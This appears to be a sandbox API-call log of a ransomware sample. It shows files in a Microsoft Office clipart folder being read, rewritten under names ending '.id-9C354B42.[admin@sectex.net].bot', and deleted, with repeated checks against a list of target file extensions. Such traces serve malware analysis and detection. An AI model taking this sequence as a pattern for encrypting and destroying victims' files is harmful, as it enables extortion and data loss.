	[0146.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0146.526] GetLastError () returned 0x0
	[0146.526] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x13ea, lpOverlapped=0x0) returned 1
	[0146.528] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x13f0, lpOverlapped=0x0) returned 1
	[0146.529] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.529] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.529] SetEndOfFile (hFile=0x3c4) returned 1
	[0146.529] CloseHandle (hObject=0x3c4) returned 1
	[0146.529] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.529] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.531] CloseHandle (hObject=0x3a0) returned 1
	[0146.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.532] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf")) returned 1
	[0146.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.532] lstrlenW (lpString=".doc") returned 4
	[0146.532] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.532] lstrlenW (lpString=".docx") returned 5
	[0146.532] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.532] lstrlenW (lpString=".pdf") returned 4
	[0146.532] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString=".xls") returned 4
	[0146.533] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.533] lstrlenW (lpString=".xlsx") returned 5
	[0146.533] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.533] lstrlenW (lpString=".ppt") returned 4
	[0146.533] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.533] lstrlenW (lpString=".zip") returned 4
	[0146.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.533] lstrlenW (lpString=".rar") returned 4
	[0146.533] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString=".bz2") returned 4
	[0146.533] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString=".7z") returned 3
	[0146.533] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.533] lstrlenW (lpString=".dbf") returned 4
	[0146.533] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.533] lstrlenW (lpString=".1cd") returned 4
	[0146.533] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.533] lstrlenW (lpString=".jpg") returned 4
	[0146.533] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.533] lstrlenW (lpString=".doc") returned 4
	[0146.533] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.533] lstrlenW (lpString=".docx") returned 5
	[0146.533] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.533] lstrlenW (lpString=".pdf") returned 4
	[0146.533] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.534] lstrlenW (lpString=".xls") returned 4
	[0146.534] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.534] lstrlenW (lpString=".xlsx") returned 5
	[0146.534] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.534] lstrlenW (lpString=".ppt") returned 4
	[0146.534] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.534] lstrlenW (lpString=".zip") returned 4
	[0146.534] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.534] lstrlenW (lpString=".rar") returned 4
	[0146.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.534] lstrlenW (lpString=".bz2") returned 4
	[0146.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.534] lstrlenW (lpString=".7z") returned 3
	[0146.534] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.534] lstrlenW (lpString=".dbf") returned 4
	[0146.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.534] lstrlenW (lpString=".1cd") returned 4
	[0146.534] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 63
	[0146.534] lstrlenW (lpString=".jpg") returned 4
	[0146.534] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.534] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.534] lstrlenW (lpString="FD00455_.WMF") returned 12
	[0146.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.535] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=8926) returned 1
	[0146.535] CloseHandle (hObject=0x3a0) returned 1
	[0146.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf")) returned 0x20
	[0146.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.535] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.535] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0146.536] GetLastError () returned 0x0
	[0146.536] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x22de, lpOverlapped=0x0) returned 1
	[0146.538] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x22e0, lpOverlapped=0x0) returned 1
	[0146.539] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.539] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.539] SetEndOfFile (hFile=0x3c4) returned 1
	[0146.539] CloseHandle (hObject=0x3c4) returned 1
	[0146.539] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.539] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.541] CloseHandle (hObject=0x3a0) returned 1
	[0146.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf")) returned 1
	[0146.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.542] lstrlenW (lpString=".doc") returned 4
	[0146.542] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.542] lstrlenW (lpString=".docx") returned 5
	[0146.542] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.542] lstrlenW (lpString=".pdf") returned 4
	[0146.542] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.542] lstrlenW (lpString=".xls") returned 4
	[0146.542] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.542] lstrlenW (lpString=".xlsx") returned 5
	[0146.542] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.542] lstrlenW (lpString=".ppt") returned 4
	[0146.543] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.543] lstrlenW (lpString=".zip") returned 4
	[0146.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.543] lstrlenW (lpString=".rar") returned 4
	[0146.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString=".bz2") returned 4
	[0146.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString=".7z") returned 3
	[0146.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.543] lstrlenW (lpString=".dbf") returned 4
	[0146.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.543] lstrlenW (lpString=".1cd") returned 4
	[0146.543] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.543] lstrlenW (lpString=".jpg") returned 4
	[0146.543] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.543] lstrlenW (lpString=".doc") returned 4
	[0146.543] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString=".docx") returned 5
	[0146.543] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.543] lstrlenW (lpString=".pdf") returned 4
	[0146.543] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.543] lstrlenW (lpString=".xls") returned 4
	[0146.543] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.543] lstrlenW (lpString=".xlsx") returned 5
	[0146.543] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.544] lstrlenW (lpString=".ppt") returned 4
	[0146.544] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.544] lstrlenW (lpString=".zip") returned 4
	[0146.544] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.544] lstrlenW (lpString=".rar") returned 4
	[0146.544] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.544] lstrlenW (lpString=".bz2") returned 4
	[0146.544] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.544] lstrlenW (lpString=".7z") returned 3
	[0146.544] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.544] lstrlenW (lpString=".dbf") returned 4
	[0146.544] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.544] lstrlenW (lpString=".1cd") returned 4
	[0146.544] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63
	[0146.544] lstrlenW (lpString=".jpg") returned 4
	[0146.544] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.544] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.544] lstrlenW (lpString="FD00459_.WMF") returned 12
	[0146.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.545] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17406) returned 1
	[0146.545] CloseHandle (hObject=0x3a0) returned 1
	[0146.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf")) returned 0x20
	[0146.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.545] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.545] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0146.546] GetLastError () returned 0x0
	[0146.546] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x43fe, lpOverlapped=0x0) returned 1
	[0146.548] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4400, lpOverlapped=0x0) returned 1
	[0146.549] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.549] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.550] SetEndOfFile (hFile=0x3c4) returned 1
	[0146.550] CloseHandle (hObject=0x3c4) returned 1
	[0146.550] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.550] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.552] CloseHandle (hObject=0x3a0) returned 1
	[0146.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf")) returned 1
	[0146.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.553] lstrlenW (lpString=".doc") returned 4
	[0146.553] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.553] lstrlenW (lpString=".docx") returned 5
	[0146.553] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.553] lstrlenW (lpString=".pdf") returned 4
	[0146.700] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.700] lstrlenW (lpString=".xls") returned 4
	[0146.700] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.700] lstrlenW (lpString=".xlsx") returned 5
	[0146.700] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.701] lstrlenW (lpString=".ppt") returned 4
	[0146.701] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.701] lstrlenW (lpString=".zip") returned 4
	[0146.701] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.701] lstrlenW (lpString=".rar") returned 4
	[0146.701] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString=".bz2") returned 4
	[0146.701] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString=".7z") returned 3
	[0146.701] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.701] lstrlenW (lpString=".dbf") returned 4
	[0146.701] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.701] lstrlenW (lpString=".1cd") returned 4
	[0146.701] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.701] lstrlenW (lpString=".jpg") returned 4
	[0146.701] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.701] lstrlenW (lpString=".doc") returned 4
	[0146.701] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString=".docx") returned 5
	[0146.701] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.701] lstrlenW (lpString=".pdf") returned 4
	[0146.701] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.701] lstrlenW (lpString=".xls") returned 4
	[0146.701] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.701] lstrlenW (lpString=".xlsx") returned 5
	[0146.702] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.702] lstrlenW (lpString=".ppt") returned 4
	[0146.702] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.702] lstrlenW (lpString=".zip") returned 4
	[0146.702] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.702] lstrlenW (lpString=".rar") returned 4
	[0146.702] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.702] lstrlenW (lpString=".bz2") returned 4
	[0146.702] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.702] lstrlenW (lpString=".7z") returned 3
	[0146.702] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.702] lstrlenW (lpString=".dbf") returned 4
	[0146.702] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.702] lstrlenW (lpString=".1cd") returned 4
	[0146.702] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 63
	[0146.702] lstrlenW (lpString=".jpg") returned 4
	[0146.702] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.702] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.702] lstrlenW (lpString="FD01074_.WMF") returned 12
	[0146.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.918] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=4634) returned 1
	[0146.918] CloseHandle (hObject=0x384) returned 1
	[0146.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf")) returned 0x20
	[0147.006] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0147.007] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.007] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
